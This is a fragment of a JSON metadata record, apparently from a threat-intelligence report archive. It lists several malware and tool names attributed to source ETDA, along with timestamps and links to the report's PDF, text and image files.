				"XShellGhost",
				"XXMM",
				"gsecdump",
				"rarstar"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434295,
	"ts_updated_at": 1775792173,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dbb55bc5b016da66d2021a78743f7284add9c492.pdf",
		"text": "https://archive.orkl.eu/dbb55bc5b016da66d2021a78743f7284add9c492.txt",
		"img": "https://archive.orkl.eu/dbb55bc5b016da66d2021a78743f7284add9c492.jpg"
	}
}